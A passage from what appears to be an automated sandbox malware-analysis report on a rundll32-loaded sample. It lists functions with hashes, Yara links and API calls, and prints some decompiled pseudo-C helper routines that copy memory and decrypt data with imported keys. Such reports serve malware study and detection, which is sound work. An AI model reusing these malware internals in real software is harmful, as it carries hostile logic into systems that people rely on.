                                          • Instruction Fuzzy Hash: 9CB01236000100ABDE014B10ED04F057B21A750701F014811F30D820708B3104E4EB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048917E5 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E048917E5(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E04892F5B(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E04894DF6(_t53);
						_v8 = _t51;
						_t73 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E04894C73(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E0489679A(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E04893072(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                          0x048917f0
                                          0x048917f3
                                          0x048917fa
                                          0x048917fd
                                          0x04891800
                                          0x04891805
                                          0x04891901
                                          0x04891905
                                          0x04891817
                                          0x04891823
                                          0x0489182a
                                          0x04891831
                                          0x00000000
                                          0x00000000
                                          0x04891837
                                          0x0489183f
                                          0x00000000
                                          0x00000000
                                          0x04891845
                                          0x0489184e
                                          0x04891852
                                          0x00000000
                                          0x00000000
                                          0x04891854
                                          0x0489185b
                                          0x04891860
                                          0x04891863
                                          0x04891865
                                          0x048918e6
                                          0x048918ed
                                          0x048918ef
                                          0x00000000
                                          0x00000000
                                          0x048918f1
                                          0x048918f5
                                          0x048918fa
                                          0x048918fa
                                          0x00000000
                                          0x048918f5
                                          0x0489186c
                                          0x04891874
                                          0x04891874
                                          0x0489187d
                                          0x0489188b
                                          0x048918e2
                                          0x048918e2
                                          0x00000000
                                          0x048918ae
                                          0x048918b1
                                          0x00000000
                                          0x048918b1
                                          0x0489188b
                                          0x048918c0
                                          0x048918ce
                                          0x048918d3
                                          0x048918d5
                                          0x048918ea
                                          0x00000000
                                          0x048918ea
                                          0x048918d7
                                          0x048918dd
                                          0x048918e0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x048918e0

                                          APIs
                                          • memcpy.NTDLL(00000000,?,?,?,?,048958B7,00000001,?,?,048958B7), ref: 0489186C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                          • Instruction ID: f38058c0e8c49f06cc42df3e63c91e3d83452e2482ef809d158e3ba8ff392530
                                          • Opcode Fuzzy Hash: eeb1230fe5a49d3e01f8d9271f8ab7622e43da6029275f198d82e6dbb559eb0b
                                          • Instruction Fuzzy Hash: D9312171E0461AEFFF11EE98C884AADB7F5BB04208F184AA9E515F7140D770AE45FB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6A0B6 Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,00B67C87,00000000,?,00B67C87,00000000,00000001,00000000,76D84D40,?,?,?,00B67C87,00000000), ref: 00B6A148
                                            • Part of subcall function 00B6C051: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,?,00B63796,00000000,00000001,-00000007,?,00000000), ref: 00B6C074
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HeapQueryValue$AllocateCloseFreememcpy
                                          • String ID:
                                          • API String ID: 1301464996-0
                                          • Opcode ID: 765faacff86edbfd15fda3b0d7d05d1bfc450c07f010629666a82807a9060afc
                                          • Instruction ID: 6b2895eed44ad5c87c5b8126fea9f369de4ae9baed42e71efb34d81dbf37488b
                                          • Opcode Fuzzy Hash: 765faacff86edbfd15fda3b0d7d05d1bfc450c07f010629666a82807a9060afc
                                          • Instruction Fuzzy Hash: 45119E76610201AFDF14EF48DC81EA977E9EB4B310F1000A9FA06BB291DB789D409F11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B55263 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcpy.NTDLL(?,00B79344,00000018,00B5D1A4,06148E36,?,00B5D1A4,06148E36,?,00B5D1A4,06148E36,?,?,?,?,00B5D1A4), ref: 00B55318
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 613e5d7ce294fc27f4408ca9a1bd7eee3b7397a6c7c3e277e6c07f4027170921
                                          • Instruction ID: e0e832c97c2af2f2d968cc79083444e3e89061bf99d9e4a3cd6d8db4878b3bd0
                                          • Opcode Fuzzy Hash: 613e5d7ce294fc27f4408ca9a1bd7eee3b7397a6c7c3e277e6c07f4027170921
                                          • Instruction Fuzzy Hash: 11116331610509AFDB24DF55EC49DB637E5FB8531170B40A6B90D8B2B1DF316D88CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B55FC9 Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 00B5603A
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                            • Part of subcall function 00B55DA0: CloseHandle.KERNEL32(?), ref: 00B55DC6
                                            • Part of subcall function 00B55DA0: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00B55DD2
                                            • Part of subcall function 00B55DA0: GetModuleHandleA.KERNEL32(?,0614978E), ref: 00B55DF2
                                            • Part of subcall function 00B55DA0: GetProcAddress.KERNEL32(00000000), ref: 00B55DF9
                                            • Part of subcall function 00B55DA0: Thread32First.KERNEL32(?,0000001C), ref: 00B55E09
                                            • Part of subcall function 00B55DA0: CloseHandle.KERNEL32(?), ref: 00B55E51
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                                          • String ID:
                                          • API String ID: 2627809124-0
                                          • Opcode ID: 2fedf65652993fbf56d2421523c276df8c4b6b22dc9ddc54d4fe8440bd9024d3
                                          • Instruction ID: c8644ce694238ab1c81c2a750a58212a9207e946df3a8850e76ca6aef216bb63
                                          • Opcode Fuzzy Hash: 2fedf65652993fbf56d2421523c276df8c4b6b22dc9ddc54d4fe8440bd9024d3
                                          • Instruction Fuzzy Hash: 29018F72610109BF8B25EBA9DD89D9FB7FCEF0534674000E9F805A3191DA31AE44CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6567E Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,00B634FE,00B69CDB,00000000,00000000), ref: 00B656F4
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60064
                                            • Part of subcall function 00B60052: StrChrA.SHLWAPI(?,00000020,?,00000000,00B56025,00000000,?,00000000,?,?,?,?,?,?), ref: 00B60073
                                            • Part of subcall function 00B53622: lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                            • Part of subcall function 00B53622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                            • Part of subcall function 00B53622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                            • Part of subcall function 00B53622: GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                            • Part of subcall function 00B53622: HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                                          • String ID:
                                          • API String ID: 730886825-0
                                          • Opcode ID: 2ecd59795ad88bd7c01b9eb447395168ce43fc4b77305f5d6da02f266f074d2e
                                          • Instruction ID: 0056942bd65d1f227b595a009ae1432a12ca41549205676ef73995da8eab2131
                                          • Opcode Fuzzy Hash: 2ecd59795ad88bd7c01b9eb447395168ce43fc4b77305f5d6da02f266f074d2e
                                          • Instruction Fuzzy Hash: 53017C31610205BBDB21D799DD4AF9F7BECEF05750F500099FA09A31E0DA74AE84CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B66BDA Relevance: 1.3, APIs: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B66BF8
                                            • Part of subcall function 00B5A3BD: memset.NTDLL ref: 00B5A3E3
                                            • Part of subcall function 00B5A3BD: memcpy.NTDLL ref: 00B5A40B
                                            • Part of subcall function 00B5A3BD: GetLastError.KERNEL32(00000010,00000218,00B7327D,00000100,?,00000318,00000008), ref: 00B5A422
                                            • Part of subcall function 00B5A3BD: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00B7327D,00000100), ref: 00B5A505
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastmemset$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 4290293647-0
                                          • Opcode ID: edb86a3c3fc946ce77e6c5985e7340f0a66807dec931a112dcf58ad4e6f00f81
                                          • Instruction ID: bba141b56280a8d3024a656784a5404d83ac0a9b34170b38557cd4e004a183c6
                                          • Opcode Fuzzy Hash: edb86a3c3fc946ce77e6c5985e7340f0a66807dec931a112dcf58ad4e6f00f81
                                          • Instruction Fuzzy Hash: E401FD7064270C6BC7209F29D841B8A7BE8EF44318F0088AAFC84A7242C779E9048AA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489427E Relevance: 1.3, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0489427E(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04894E0B(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x489a2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04896D05(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}








                                          0x0489427e
                                          0x04894286
                                          0x0489429d
                                          0x048942b8
                                          0x048942bc
                                          0x048942c1
                                          0x048942c3
                                          0x048942d5
                                          0x048942e1
                                          0x048942c5
                                          0x048942c5
                                          0x048942ca
                                          0x048942cf
                                          0x048942cf
                                          0x048942c3
                                          0x048942e7
                                          0x048942eb
                                          0x048942eb
                                          0x04894292
                                          0x04894297
                                          0x0489429b
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                            • Part of subcall function 04896D05: SysFreeString.OLEAUT32(00000000), ref: 04896D68
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,76DDF710,?,00000000,?,00000000,?,0489681F,?,004F0053,052493D8,00000000,?), ref: 048942E1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Free$HeapString
                                          • String ID:
                                          • API String ID: 3806048269-0
                                          • Opcode ID: b2bc1cdc9c1752afec489e4ce1bf63716b13350e23241d449a1f32f092782ce1
                                          • Instruction ID: 828207846863616ad22358fb97a0ca3132020df0e0860ca3885b5c1071591014
                                          • Opcode Fuzzy Hash: b2bc1cdc9c1752afec489e4ce1bf63716b13350e23241d449a1f32f092782ce1
                                          • Instruction Fuzzy Hash: 1D014F36504A19BBCF269F94CC04EEA3BA5FF44B50F088918FE199A120D771ED61DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489723B Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 75%
                                          			E0489723B(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04893072( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04894DF6(_a8 + _a8);
					if(_t21 != 0) {
						E04891908(_a4, _t21, _t23);
					}
					E04894C73(_a4);
				}
				return _t21;
			}





                                          0x04897243
                                          0x0489724a
                                          0x0489724c
                                          0x0489725b
                                          0x04897262
                                          0x04897271
                                          0x04897275
                                          0x0489727c
                                          0x0489727c
                                          0x04897284
                                          0x04897289
                                          0x0489728e

                                          APIs
                                          • lstrlen.KERNEL32(?,?,?,00000000,?,0489379D,00000000,?,?,?,0489653D,?,052495B0), ref: 0489724C
                                            • Part of subcall function 04893072: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,048958B7), ref: 048930AA
                                            • Part of subcall function 04893072: memcpy.NTDLL(?,048958B7,00000010,?,?,?,?,?,?,?,?,?,?,0489564C,00000000,04896D90), ref: 048930C3
                                            • Part of subcall function 04893072: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 048930EC
                                            • Part of subcall function 04893072: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04893104
                                            • Part of subcall function 04893072: memcpy.NTDLL(00000000,04896D90,048958B7,0000011F), ref: 04893156
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                          • String ID:
                                          • API String ID: 894908221-0
                                          • Opcode ID: ec699373c060feec39b9ba1daa27f8670f09c686b85bfd41c6ffec03933f15d2
                                          • Instruction ID: 429550f4d9d2172192c780e0e3983d83a6c35c8604b0451efacc4b14a9096503
                                          • Opcode Fuzzy Hash: ec699373c060feec39b9ba1daa27f8670f09c686b85bfd41c6ffec03933f15d2
                                          • Instruction Fuzzy Hash: 1BF0B436100808BBEF016F59CC00CDB3BEDEF88654B088611FD19CA010DA72EE528BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04893B76 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04893B76(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04893BBE(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E048978E7(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                          0x04893b7e
                                          0x04893b98
                                          0x00000000
                                          0x04893bb4
                                          0x04893b8f
                                          0x04893b96
                                          0x00000000
                                          0x00000000
                                          0x04893bbb

                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,04896FE9,3D048990,80000002,04892A82,0489744C,74666F53,4D4C4B48,0489744C,?,3D048990,80000002,04892A82,?), ref: 04893B9B
                                            • Part of subcall function 048978E7: SysAllocString.OLEAUT32(0489744C), ref: 04897900
                                            • Part of subcall function 048978E7: SysFreeString.OLEAUT32(00000000), ref: 04897941
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFreelstrlen
                                          • String ID:
                                          • API String ID: 3808004451-0
                                          • Opcode ID: 3e12a618e76613612c88590a03c75b7d088da12fee36e51f9177720faa5e41a9
                                          • Instruction ID: 781ae2f75f70b1e339c661aa87c0502da9e527989597d88ecb6e07bcb21cdb4e
                                          • Opcode Fuzzy Hash: 3e12a618e76613612c88590a03c75b7d088da12fee36e51f9177720faa5e41a9
                                          • Instruction Fuzzy Hash: 03F07F3200060ABBDF025F90DC05EAA3BAAEB18354F088514FE1494160DB72D9B1EBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896D7F Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04896D7F(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E048955D3(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E04894C73(_a4);
				}
				return _t12;
			}





                                          0x04896d8b
                                          0x04896d90
                                          0x04896d94
                                          0x04896d9b
                                          0x04896da6
                                          0x04896daa
                                          0x04896daa
                                          0x04896db3

                                          APIs
                                            • Part of subcall function 048955D3: memcpy.NTDLL(00000000,00000110,?,?,?,?,04896D90,?,048958B7,048958B7,?), ref: 04895609
                                            • Part of subcall function 048955D3: memset.NTDLL ref: 0489567F
                                            • Part of subcall function 048955D3: memset.NTDLL ref: 04895693
                                          • memcpy.NTDLL(?,048958B7,00000000,?,048958B7,048958B7,?,?,048958B7,?), ref: 04896D9B
                                            • Part of subcall function 04894C73: RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpymemset$FreeHeap
                                          • String ID:
                                          • API String ID: 3053036209-0
                                          • Opcode ID: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                          • Instruction ID: 41e2caf78656c6e46c661f79169ba1141a52a0e7edc91bc95492530363f19f2b
                                          • Opcode Fuzzy Hash: f5baabf818e55cf08db677d9f53549de5cca9e0683dc86cfcacb622431568ded
                                          • Instruction Fuzzy Hash: 18E086334089287BDF122A98DC00EEB7F9D9F45A94F084610FD08D5114D671EE1093E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6CC5D Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B6CC67
                                            • Part of subcall function 00B66278: RegOpenKeyExA.KERNEL32(00B6CC7F,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,00B6CC7F,80000001,?,00B66085), ref: 00B662BF
                                            • Part of subcall function 00B66278: RegOpenKeyExA.ADVAPI32(00B6CC7F,00B6CC7F,00000000,00020019,80000001,?,00B6CC7F,80000001,?,00B66085), ref: 00B662D5
                                            • Part of subcall function 00B66278: RegCloseKey.KERNEL32(80000001,80000001,?,00B66085,00B66095,?,00B6CC7F,80000001,?,00B66085), ref: 00B6631E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Open$Closememset
                                          • String ID:
                                          • API String ID: 1685373161-0
                                          • Opcode ID: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                          • Instruction ID: 11e2485c4209a81d3a6bbf14ac34fd1491847b596f9ff6a85fd546d524111a09
                                          • Opcode Fuzzy Hash: 887940abae79aea46411e19364c5ca154fb75fbdc64aed8402730900f18d6132
                                          • Instruction Fuzzy Hash: B8E0173024010CBBDB14AE54CC52FA97BA9EF14350F00C069BE0C5F282DA79EA60CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6485E Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,00B750E8,0000002C,00B5B707,06148E36,?,00000000,00B5A3F0,?,00000318), ref: 00B64878
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeVirtual
                                          • String ID:
                                          • API String ID: 1263568516-0
                                          • Opcode ID: 8b15ddb4c0ae156d8227d14d05d61dfae6f4caef44abad0a7d075d7eb6bcb724
                                          • Instruction ID: 3b4ef476848c86bca89e1a8fff9c1cfe4eb9e9b63e85f06d7eaf9e85c82d7d25
                                          • Opcode Fuzzy Hash: 8b15ddb4c0ae156d8227d14d05d61dfae6f4caef44abad0a7d075d7eb6bcb724
                                          • Instruction Fuzzy Hash: 2FD0E231D00629DBCB219BA4DC4699EFBB1BB08B21B608264E564671A0C72019558B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00B55A14 Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON
                                          Download Yara Rule
                                          APIs
